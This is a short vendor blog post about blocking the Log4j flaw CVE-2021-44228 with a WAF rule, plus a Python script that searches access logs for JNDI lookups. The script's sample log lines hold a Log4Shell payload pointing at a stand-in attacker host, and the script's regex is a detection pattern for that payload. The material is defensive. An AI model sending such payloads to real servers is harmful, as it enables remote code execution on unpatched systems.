Blocking CVE-2021-44228 / Log4j Vulnerability on Nova

by Dave Blakey • December 11, 2021

As you have no doubt already seen, a critical vulnerability in Log4j is making waves on the internet, specifically CVE-2021-44228.

Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

The most common attack types we've seen were already pre-blocked by Nova WAFs, as seen below:

[Image: base64_block]

However, we have added an additional block specifically for the jndi:ldap vulnerability. To ensure you have it, simply redeploy (click Save or Attach) your ADCs to immediately apply the new update.
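To check whether such requests reached an application before the block was in place, access logs can be searched for the lookup string. The following is an added example, not Nova's rule 991001 or any code from Snapt: it flags the plain and URL-encoded forms of a `${jndi:...}` lookup only, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Matches a Log4j lookup that invokes JNDI, e.g. ${jndi:ldap://host/a}.
# The scheme is captured so hits can be grouped by protocol.
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly so single- and double-encoded forms are seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_jndi_lookups(log_lines):
    """Return (line_number, scheme) for every line containing a JNDI lookup."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = JNDI_LOOKUP.search(decode_fully(line))
        if match:
            hits.append((number, match.group(1).lower()))
    return hits


# Constructed sample access-log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '198.51.100.9 "GET / HTTP/1.1" 403 "${jndi:ldap://attacker.example/a}"',
    '198.51.100.9 "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D'
    ' HTTP/1.1" 403 "-"',
    '198.51.100.4 "GET /docs/jndi-overview HTTP/1.1" 200 "curl/8.0"',
]

if __name__ == "__main__":
    for number, scheme in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup using scheme {scheme!r}")
```

A hit in a header or query string shows an attempt was made, not that it succeeded; whether the value was ever passed to a vulnerable Log4j2 logger has to be checked on the application side.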

We recommend all users keep the new rule (ID 991001) enabled due to the large number of applications that utilize log4j2. You will see blocks for the new rule as below: